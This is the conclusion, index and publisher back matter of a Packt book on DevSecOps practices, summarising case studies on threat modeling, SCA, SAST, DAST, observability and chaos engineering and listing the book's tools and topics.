Governance and an effective Security Champions program Governance in DevSecOps involves defining roles and responsibilities, policies, and standards related to security in the DevOps process. Like an experienced chef, knowing what ingredients (policies) to use, in what quantities (standards), and when to add them (roles and responsibilities) is crucial to the result.

Topics covered in this book

The Security Champions program, on the other hand, is like a society of security evangelists within your team. Members are trained in security best practices and serve as the go-to people for security-related issues. They help drive the security culture and ensure that DevSecOps practices are implemented effectively. Let’s delve into some more detailed conclusions from this book: • Culture shift: A recurrent theme across all case studies is the importance of a cultural shift toward treating security as everyone’s responsibility. This culture isn’t created overnight; it requires continuous effort, training, and awareness programs to nurture and maintain. • Security integration: Another critical takeaway is the value of integrating security early into the CI/CD pipeline. When security checks and controls are built into the development process from the beginning, vulnerabilities can be detected and addressed earlier, reducing the cost and complexity of remediation. • Automated compliance checks: All the case studies in this book highlighted the use of automated compliance checks. These not only save time and reduce human error but also ensure consistent adherence to necessary regulations. • Continuous monitoring and improvement: This book stressed the importance of ongoing monitoring and refinement of DevSecOps practices. This includes monitoring security metrics, regularly reviewing security procedures, and continuously learning and improving to keep up with evolving security threats. • Learning from incidents: Each case study emphasized learning from security incidents. This includes conducting post-incident reviews to understand what went wrong, how it can be prevented in the future, and how the response can be improved. This iterative learning process is crucial for continually improving the organization’s security posture. • Tailoring practices: The case studies also showed that there’s no one-size-fits-all approach to DevSecOps. Each organization had to tailor DevSecOps practices and tools to their specific context and needs.

Topics covered in this book The following topics were covered in detail: • Threat modeling: Threat modeling is a proactive approach to identifying, understanding, and mitigating potential security threats. In the case of the government agency (GovAgency), threat modeling was used to determine the most likely and dangerous threats to their infrastructure. This helped them prioritize their security efforts and invest in the most effective countermeasures. • Software composition analysis (SCA): SCA is used to identify potential vulnerabilities in open source components of software. The IT company (TechSoft) heavily relied on SCA to ensure the open source components they used did not compromise their software’s security. It helped them keep track of all third-party components, their associated licenses, and known vulnerabilities.

217

218

Conclusion

• SAST and DAST: SAST involves examining the source code for potential vulnerabilities, while DAST involves testing a running application for vulnerabilities. The e-commerce platform (ShopNet) implemented both SAST and DAST in its CI/CD pipeline to catch security issues early and reduce the time and cost of remediation. • Observability: Observability, which is the ability to infer the internal states of a system based on its outputs, is critical to understanding system performance and identifying anomalies. In HealthPlus’ case, enhancing observability was a key part of their DevSecOps strategy. It enabled them to spot abnormal system behavior that could signify a security breach and respond rapidly. • Chaos engineering: Chaos engineering is the practice of deliberately injecting failure into systems to ensure they can withstand unexpected disruptions. For TechSoft, chaos engineering became an essential part of their strategy to ensure their software was resilient against security threats. Regularly “breaking” their systems in controlled ways allowed them to identify weaknesses before they could be exploited by malicious actors.

What’s next? The next book in the DevSecOps series could explore advanced concepts and deeper intricacies of the practice. It would be a hands-on book that contains examples, code, and pipelines that you could test and learn with. Here’s a proposed outline: 1. Advanced DevSecOps strategies: The book could delve deeper into implementing more sophisticated DevSecOps strategies that can help organizations achieve greater security resilience. For instance, topics could include multi-layered defense systems, cloud-native security strategies, and how to utilize artificial intelligence and machine learning to enhance security measures. Just like leveling up in a video game, these advanced strategies are the power-ups your DevSecOps team needs! 2. Dealing with DevSecOps challenges: A significant portion of the book might be dedicated to handling challenges and setbacks in a DevSecOps setup. These could include managing false positives in security checks, dealing with legacy systems, navigating regulatory challenges, and more. Picture these challenges as the “boss fights” in your DevSecOps journey. 3. Enhancing team dynamics in DevSecOps: The book could discuss fostering better communication between the Dev, Sec, and Ops teams, developing a security-first mindset in all team members, and cultivating an environment of continuous learning. It’s like running a successful band; you need harmony between all the members to produce a beautiful symphony.

Case studies and conclusion

4. DevSecOps in different industry verticals: The book may also explore how DevSecOps is implemented in various industry verticals, such as finance, healthcare, and retail, and how it needs to be tailored to fit the unique requirements of each. Think of it as cooking a dish for different taste palates; you need to adjust the ingredients and cooking methods based on what’s preferred. 5. Future of DevSecOps: It’s always crucial to keep an eye on the horizon. The book could discuss emerging trends and technologies in the DevSecOps field, such as quantum computing’s impact on security, the evolving landscape of cyber threats, and the rise of PrivacyOps. It’s like trying to predict the next big fashion trend; you never quite know what’s going to be “in,” but you can look at patterns and make educated guesses. 6. More case studies and real-world examples: No book would be complete without real-world examples. More case studies and interviews with industry experts could provide readers with valuable insights into how DevSecOps is being used in the trenches. It’s like hearing war stories from seasoned veterans; there’s always something to learn from their experiences.

Case studies and conclusion Various case studies show how companies have successfully integrated DevSecOps and the benefits they’ve derived from it. From speeding up development cycles, identifying vulnerabilities earlier, and reducing costs, the benefits are significant. In one case, a company used to run a weekly “bug bounty” event, turning vulnerability hunting into a fun game, resulting in a significant reduction in security issues. Integrating security into the DevOps process is not only a best practice but an essential strategy for organizations to protect their assets and ensure the delivery of safe, secure products. Imagine running a marathon while juggling – that’s DevSecOps in a nutshell, blending speed (DevOps) with skill (security), resulting in a secure, agile product development environment. DevSecOps in Action has shown that a robust DevSecOps strategy involves much more than just a cultural shift. It requires the careful application of sophisticated techniques and practices such as threat modeling, SCA, SAST, DAST, enhancing system observability, and chaos engineering. These elements work together to create a system where security is integrated at every step of the development process, and continuous improvement and learning are at the heart of the organization’s approach to security. This book concluded with practical tips and advice for those looking to build a career in DevSecOps, akin to a guide for “newbie” adventurers starting their quests in a fantasy game. Throughout the next book, there would still be plenty of funny anecdotes and analogies to keep the readers entertained and engaged. At the end of the day, learning should be fun!

219

Index A advanced DAST techniques API testing 150 authentication testing 150 fuzz testing 150 mobile application testing 151 Affero General Public License (AGPL) 185 Agile methodology 6 scrum 6 sprints 7 teams working together 7, 9 Alertmanager 79, 168 Ansible 75, 77, 139 API testing 150 Appium 72 Aqua 216 artifactory 34 artifact storing 72 considerations 74 key components and terminologies 73 popular tools 73 significance 72, 73 tools, key features 73, 74 Artificial intelligence for IT operations (AIOps) 79

authentication testing 150 automated builds 68 challenges and solutions 70 key components and terminologies 69 popular tools 70 significance 69 AWS CodeDeploy 75 AWS Simple Storage Service (S3) 73 Azure Artifacts 73

B Bamboo 75 Bandit 122 behavior-driven development (BDD) 72 Brakeman 123

C Capital One data breach case study 140 CD 63-65 scrapbook example 64, 65 chaos engineering 51-53, 218 basic principles 57 best practices 54 challenges 59 need for 53

222

Index

performance effectiveness, measuring 55, 56 specific systems and services organizations use 55 techniques 54 tools 56 versus, other testing measures 59, 60 chaos engineering principles 57 robust, developing from failures 58 team communication strategies 57, 58 ChatOps 79 Chef 76, 77, 139 CI 63, 64 CI/CD 63 CI/CD pipeline 64 benefits 65, 66 setting up, for DevSecOps program 164 significance 82-84 steps 65 technicalities, of setting up 165 CI/CD pipeline automation artifact storing 72 automated builds 68 continuous testing 70 deployment automation 74 environment consistency 76 monitoring and feedback 78 performing 66 rollbacks 79 source control 67 CI/CD pipeline set up GitLab CI/CD 165 Jenkins 165 pre-setup 165 Travis CI 166 CircleCI 70, 72 CloudFormation 139 Codecov security incident case study 139, 140

command-line interface (CLI) 130 container security tools 216 continuous testing 70 challenges and solutions 71 key components and terminologies 71 popular tools 71 significance 70 copyleft licenses 180 impact of software redistribution, and modifications 180 cross-site request forgery (CSRF) 145 cross-site scripting (XSS) 92, 116 Cucumber 72

D DAST environment setting up 152 suitable environment, selecting 152 test data, preparing 153 testing environment, isolating 153 DAST integration, into SDLC continuous deployment (CD) 146 continuous integration (CI) 146 DAST tool selecting 151 Dependency-Check 110 deployment automation 74 advanced tools and technologies 76 challenges 75 key components and terminologies 75 popular tools 75 real-world scenarios 76 significance 74 deployment phase, threat modeling threat modeling updates 92 design phase, threat modeling attack surface analysis 92 threat model creation 91

Index

development phase, threat modeling code reviews and static analysis 92 coding guidelines, securing 92 development process audit 37 compliance 37 developer tools 38 incident response 38 monitoring 38 multi-cloud security 37 security 37 vulnerability management 38, 39 DevOps 9, 10 DevSecOps 10, 17, 136, 162, 176, 181, 215 cultural shift 163 elements 17 governance 216 maturity levels 12-16 practical implementation 163 practices 217 principles 216 processes 10, 11, 216 relevance, to license compliance 176, 177 Security Champions program 217 techniques 216 tools 216 DevSecOps case studies best practices 212 FinServ Corporation 205, 206 GovAgency 205, 210 HealthPlus 205, 208 TechSoft 205, 211 Verma Enterprises 205, 207 DevSecOps challenges 27 continuous application changes 28 developer knowledge gap 28 lack of AppSec tool integration 29

DevSecOps environment cloud-native architectures 35, 36 cloud-native environment 35 controls, automating 36 infrastructure, provisioning 36 monitoring 35 toolchains, securing 36 DevSecOps environment security 33 parameters, for defining security posture 34 technology effectiveness, measuring 34 third-party component, discovering 34 vulnerabilities, addressing 34 vulnerabilities inventory, building 34 workflows, managing 34 DevSecOps, in production CI/CD pipeline, managing 168 CI/CD pipeline, monitoring 168 continuous compliance and auditing, incorporating into pipeline 169 incidents, managing 169 managing 168 open source tools, for alerting 168 open source tools, for logging 168 open source tools, for monitoring 168 security breaches, responding to 169 DevSecOps, in software development best practices 213 DevSecOps pipeline impact of software licenses 181, 182 DevSecOps principles 22 automation 23 checkpoints 27 CI/CD pipeline, unifying 22 compliance checks 24 cross-skilling 25 cultural aspect approach 25 development environments 27 documentation 26

223

224

Index

failing fast 23 innovation 23 teams, educating 25 teams, empowering 25 third-party component dependencies, analyzing 22 third-party component dependencies, identifying 22, 23 toolchains 27 DevSecOps program benefits 163, 169-171 challenges 164 CI/CD pipeline, setting up 164 continuous improvement 164 security controls, implementing 166 techniques, for setting up 162 Dev teams 197 Docker 75, 77 Docker Hub 73 documentation, DevSecOps audit trails 26 change management 26 code documentation 26 design documentation 26 incident reports 26 security policies and procedures 26 testing 26 validation 26 dynamic application security testing (DAST) 36, 92, 116, 143, 216, 218 advanced techniques 150, 151 advantages 144 DAST tool, selecting 151, 152 future 157 importance, in secure development environments 148 incorporating, into application development life cycle 149, 150

incorporating, into DevOps processes 154 integrating, with IAST 154 integrating, with other security tools 153 integrating, with RASP 154 integrating, with SAST 153 limitations 145 performing, in organization 152, 153 process 145 remediation, verifying 155 reporting and remediation 154 reports, generating 155, 156 results, analyzing 154 results, correlating with other security data sources 154 retesting 156 usage, for developers 146, 147 usage, for security testers 147, 148 versus IAST 156 versus RASP 157 versus SAST 156 vulnerabilities, identifying in development process 155 vulnerabilities, prioritizing 155 vulnerabilities, remediating 155 dynamic testing 33

E ElastAlert 168 Elastic versus AWS licensing drama case study 185 elements, DevSecOps collaboration 17 culture shift 17 education and training 17 empowerment 17 shared responsibility 17 skills and expertise 17

Index

ELK Stack 79, 162, 168 environment consistency 76 challenges 77 significance 76 tools 77 ESLint 123 executive buy-in 198 importance 198 securing 198

F

GovAgency case study 210 DevSecOps practices and tools 210 results and benefits 210 security requirements 210 Gradle 70 Grafana 79, 168 graphical user interface (GUI) 130 Graylog 168

H

Federal Information Security Management Act (FISMA) 210

health check 25 Health Insurance Portability and Accountability Act (HIPAA) 209

FeedbackHub 79 FindSecBugs 123 FinServ Corporation case study 206 challenges, faced before implementing DevSecOps 206

HealthPlus case study 208 DevSecOps practices and tools 209 results and benefits 209 security, in healthcare data and systems 209 HR and learning and Dev teams 198

results and impact on software development 206, 207 steps, for DevSecOps transition 206 Flyway 80 FOSSA 110 fuzz testing 150

G General Data Protection Regulation (GDPR) 209 Git 80 GitHub Packages 73 GitLab CI/CD 72, 75 GNU General Public License (GPL) 175 Google Cloud Storage 73 Gosec 124

I IaC, in DevSecOps 136 challenges and mitigation 138 key benefits 138 process 137, 138 role 137 Infer 124 Infrastructure as Code (IaC) 129, 130 advantages 131, 132 disadvantages 132 metrics 133, 134 principles 36 process 133 scanning 129, 130 security best practices 135, 136 toolset functionalities 130, 131

225

226

Index

versus Static Application Security Testing 134, 135 vulnerabilities, identifying with 132 Inspec 169 integration tests 71 Interactive Application Security Testing (IAST) 116

J Jenkins 70, 71, 75 JFrog Artifactory 73 JUnit 71

K key performance indicators (KPIs) 16, 17 Kubernetes 76, 77, 80

L

M management/leadership team 198 Maven 70 Mend.io 111 metrics, Infrastructure as Code (IaC) code coverage 133 compliance 134 deployment frequency 134 mean time to recovery (MTTR) 134 security vulnerabilities 134 Microsoft Threat Modeling Tool 93 mobile application testing 151 Mobile Security Framework (MobSF) 151 monitoring 44 monitoring and feedback 78 best practices 79 challenges 78 feedback, from multiple fronts 79 significance 78 tools 78, 79 MSBuild 70

LaunchDarkly 80 license compliance significance 175, 176 license policies, fine-tuning 183 continuous review and improvement 184, 185

N

exception handling 184 organizational standard, establishing 184 license reviews 182 documentation and continuous improvement 183

New Relic 78 Nexus Lifecycle by Sonatype 110 Nexus Repository 73

legal and security teams, engaging 183 tools and techniques 182 Liquibase 80 LoadRunner 72

National Vulnerability Database (NVD) 98 Netflix environment improvement case study 140

O observability 41, 218 benefits 48 challenges 46, 47 implementing, with monitoring 45, 46

Index

key functions 42, 43 linking, with monitoring 44 logs 42 metrics 42 need for 41 setting up 47 tracing 42 Octopus Deploy 75 OpenSCAP 169 open source IaC tools 138 Ansible 139 Chef 139 CloudFormation 139 Pulumi 139 Puppet 139 SaltStack 139 Terraform 138 open source SAST tools Bandit 122 Brakeman 123 ESLint 123 FindSecBugs 123 Gosec 124 Infer 124 PMD 123 RIPS 123 Snyk 123 open source security tools configuration management 167 vulnerability scanning 167 open source software (OSS) 39 open source threat modeling tools 93 Microsoft Threat Modeling Tool 93 OWASP Threat Dragon 93 PyTM 93 SeaSponge 94 Open Web Application Security Project (OWASP) 12

Ops team 198 OWASP Threat Dragon 93

P penetration testing 36, 116 permissive licenses 179 security implications 180 personally identifiable information (PII) 209 PMD 123 Postman 72 pre-development phase, threat modeling 91 asset identification 91 process framework 6 product development processes 4 Agile methodology 6 Waterfall model 4 Prometheus 78, 168 proprietary licenses 181 security constraints and obligations 181 Pulumi 139 Puppet 76, 77, 139 PyTM 93

Q QUnit 72

R Redis licensing change case study 185 regression tests 71 Repository (Repo) 67 RIPS 123 rollbacks 79, 80 best practices 81 challenges 81

227

228

Index

considerations 81 potential pitfalls 82 significance 80 tools 80, 81 Rollbar 76

S SaltStack 139 SAST metrics code coverage 118 false positive rate 118 remediation time 119 risk ranking 119 vulnerability density 118 SAST tools 116 functionalities 116, 117 SCA metrics license compliance violations 105 mean time to remediation (MTTR) 106 outdated dependencies 105 policy violations 106 repeated vulnerabilities 106 severity breakdown of vulnerabilities 105 total dependencies 105 vulnerable dependencies 105 SCA tools 99 Dependency-Check 110 FOSSA 110 functionalities 99 Mend.io 111 Nexus Lifecycle by Sonatype 110 Snyk 110 Veracode Software Composition Analysis 111 WhiteSource 110 scrum 6

scrum meetings checking backlog meetings 7 daily standup meetings 7 retrospective meetings 7 sprint planning meetings 7 sprint review meetings 7 SeaSponge 94 Sec team 197 security breaches, SCA Capital One (2019) 112 Equifax (2017) 111 Marriott (2018) 113 Sony Pictures (2014) 112 Target (2013) 112 Yahoo! (2013-2014) 111, 112 Security Champions 198 Security Champions program 188, 217 as organizing, football team 191 aspects 193, 194 benefits 194-197 communication 192 considerations, for shaping organization's DevSecOps program 189 considerations, from people perspective 189, 190 delegation 192 effectiveness, evaluating with strategic aspects 200 effectiveness, evaluating with technical aspects 199, 200 effect, measuring 199 engaging 192 executive buy-in, importance 198 executive buy-in, securing 198 individuals, attracting to program 191 motivation 192 motivation to participate 193 motivation to support 193

Index

roles, of different teams 197, 198 roles within organization 195, 196 shared responsibility model 197 structuring 190 training 192 security controls, DevSecOps program implementing 166 open source security tools, identifying 167 security policies and procedures, implementing 167 Security Information and Event Management (SIEM) 149 security orchestration and automated response (SOAR) 216 security posture management 32 pipelines, managing 33 pipelines, testing 33 regular meetings 32 tools 33 Selenium 71 Sentry 76, 79 Server Side Public License (SSPL) 185 service-level agreements (SLAs) 10 shared responsibility model 197 site reliability engineering (SRE) team 41 Snyk 110, 123 software bill of materials (SBOM) 23 software composition analysis (SCA) 22, 36, 97, 98, 211, 217 advantages 101, 102 benefits 101 disadvantages 102 integrating, with CI/CD tools 107 integrating, with container security 107 integrating, with DAST 107 integrating, with IAST 107 integrating, with other security tools 106

integrating, with SAST 106 integrating, with threat intelligence platforms 107 issues, resolving without breaking build 108 metrics 105, 106 open source SCA tools 110 process 103, 104 security breaches, from past 111, 112 security flaws detection 109 significance 100, 101 versus SAST 102, 103 working 98 software delivery life cycle 181 software development life cycle (SDLC) 3, 46, 91, 115, 188 software licenses copyleft licenses 180 impact, on DevSecOps pipeline 181, 182 permissive licenses 179 proprietary licenses 181 types 179 source control 67 best practices 67, 68 common terminologies 67 significance 67 Spinnaker 75 Split.io 80 Splunk 79 sprints 7 Static Application Security Testing versus Infrastructure as Code (IaC) 134, 135 static application security testing (SAST) 36, 101, 115, 116, 216, 218 benefits 121 case study 124, 125 CI/CD integration 119 DAST integration 119 IDE integration 119

229

230

Index

integrating, with other security tools 119 issues, resolving without breaking build 120 limitations 121, 122 metrics 118 open source SAST tools 122-124 process and workflow 117, 118 threat intelligence integration 119 versus SCA 102, 103 vulnerabilities, identifying 117 WAF integration 119

T TechSoft case study 211 DevSecOps practices and tools 211 results and benefits 212 security requirements 211 Terraform 76, 77, 138 test automation tools 71 test environment 71 testing phase, threat modeling 92 penetration testing 92 TestNG 72 TheHive 169 threat modeling 85, 86, 217 importance, in SDLC 87, 88 limitations 94, 95 performing 88, 89 process 86, 87 techniques 91 threat modeling integration, into DevSecOps 91 deployment phase 92 design phase 91 development phase 92 pre-development phase 91 testing phase 92

threat modeling techniques 89 attack trees 89 brainstorming 89 Data Flow Diagrams (DFDs) 90 Denial of Service (DoS) 90 elevation of privilege 91 information disclosure 90 repudiation 90 STRIDE model 90 tampering 90 threat modeling tools for organizations 94 time-to-restore (TTR) 46 traditional licenses, versus open source licenses 177 community oversight 178 cost and resource allocation 179 modification and redistribution 178 source code access 178 vendor dependency 178 Travis CI 70, 72 Trello boards 8, 9 Twistlock 216

U unit tests 71 UserVoice 79

V Veracode Software Composition Analysis 111 Verma Enterprises case study 207 DevSecOps practices and tools 208 results and benefits 208 security challenges 207

Index

W Waterfall model 4, 6 design 5 development 5 implementation and integration 5 planning 5 production and maintenance 6 requirement gathering and analysis 5 testing 5 Wazuh 169 WhiteSource 110

231

www.packtpub.com Subscribe to our online digital library for full access to over 7,000 books and videos, as well as industry leading tools to help you plan your personal development and advance your career. For more information, please visit our website.

Why subscribe? • Spend less time learning and more time coding with practical eBooks and Videos from over 4,000 industry professionals • Improve your learning with Skill Plans built especially for you • Get a free eBook or video every month • Fully searchable for easy access to vital information • Copy and paste, print, and bookmark content Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at packtpub.com and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at customercare@packtpub. com for more details. At www.packtpub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters, and receive exclusive discounts and offers on Packt books and eBooks.

Other Books You May Enjoy If you enjoyed this book, you may be interested in these other books by Packt:

Oracle Linux Cookbook Erik Benner | Erik Thomsen ISBN: 978-1-80324-928-5 • Master the use of DNF for package management and stream-specific installations • Implement high availability services through Podman and Oracle Linux Automation Manager • Secure your system with Secure Boot and at-rest disk encryption techniques • Achieve rebootless system updates using the Ksplice technology • Optimize large-scale deployments with Oracle Linux Automation Manager and Ansible • Gain practical insights into storage management using Btrfs and LVM

Other Books You May Enjoy

Essential Linux Commands Paul Olushile ISBN: 978-1-80323-903-3 • Execute commands to launch applications, control services, and change network settings • Develop your skills to use commands for package management, file manipulation, and networking • Get clear explanations and practical examples for each command • Discover tips and techniques to use the Linux command line effectively • Get to grips with troubleshooting common problems and fixing errors • Master best practices to manage and maintain Linux systems • Develop expertise in system performance, security, and Linux in the cloud

235

236

Packt is searching for authors like you If you’re interested in becoming an author for Packt, please visit authors.packtpub.com and apply today. We have worked with thousands of developers and tech professionals, just like you, to help them share their insight with the global tech community. You can make a general application, apply for a specific hot topic that we are recruiting an author for, or submit your own idea.

Share Your Thoughts Now you’ve finished Implementing DevSecOps Practices, we’d love to hear your thoughts! If you purchased the book from Amazon, please click here to go straight to the Amazon review page for this book and share your feedback or leave a review on the site that you purchased it from. Your review is important to us and the tech community and will help us make sure we’re delivering excellent quality content.

237

Download a free PDF copy of this book Thanks for purchasing this book! Do you like to read on the go but are unable to carry your print books everywhere? Is your eBook purchase not compatible with the device of your choice? Don’t worry, now with every Packt book you get a DRM-free PDF version of that book at no cost. Read anywhere, any place, on any device. Search, copy, and paste code from your favorite technical books directly into your application. The perks don’t stop there, you can get exclusive access to discounts, newsletters, and great free content in your inbox daily Follow these simple steps to get the benefits: 1. Scan the QR code or visit the link below

https://packt.link/free-ebook/978-1-80323-149-5 2. Submit your proof of purchase 3. That’s it! We’ll send your free PDF and other benefits to your email directly